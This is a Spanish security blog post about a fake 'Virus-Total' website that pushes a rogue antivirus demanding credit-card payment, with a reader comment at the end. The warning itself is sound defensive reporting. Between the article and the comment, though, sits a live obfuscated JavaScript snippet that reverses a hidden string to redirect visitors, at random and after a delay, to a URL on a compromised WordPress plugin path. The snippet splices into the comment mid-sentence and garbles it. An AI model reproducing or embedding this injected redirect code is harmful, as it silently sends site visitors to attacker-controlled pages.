“Virus-Total” falso usado para infectar usuarios

 En los últimos días hemos hallado un caso de malware que utiliza el nombre del popular servicio VirusTotal como medio para engañar e infectar a los usuarios. Se trata de un sitio falso (virus-total.[ELIMINADO]) en el cual se simula que pueden explorarse archivos y verificar si los mismos se encuentran infectados, lo cual es un comportamiento similar al servicio real:

Y presionando sobre “SCAN” se ingresa a la siguiente página (falseando la tan conocida) en donde se simula la exploración del sistema:

Al finalizar, se descarga un archivo ejecutable (con nombres como Security Tool o similares) que en realidad es un rogue detectado como Win32/Kryptik.CRD. Una vez descargado e instalado este programa de seguridad falso luce de la siguiente manera:

Por otro lado cuando el usuario intenta “limpiar su sistema”, el software le solicitará el registro del mismo con una tarjeta de crédito.

Nuevamente en este caso los delincuentes se han valido de un servicio sumamente conocido y popular para engañar al usuario, intentando lograr la mayor cantidad de infecciones posibles en un corto tiempo.
 
 $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}total.com/es”>www.virustotal.com/es) sirve para analizar ficheros puntuales con 42 motores actualizados de los mas conocidos antivirus, no para escanear todo un disco duro o unidad escogida, como parece hacer este falso antivirus que usa el nombre de Virus-Total (con guión en medio), y además con dominio .in (que es interceptado por el  SiteAdvisor de McAfee ,  si se tiene instalado)

mas información en inglés original en totalcom.html

saludos

ms, 2-3-2010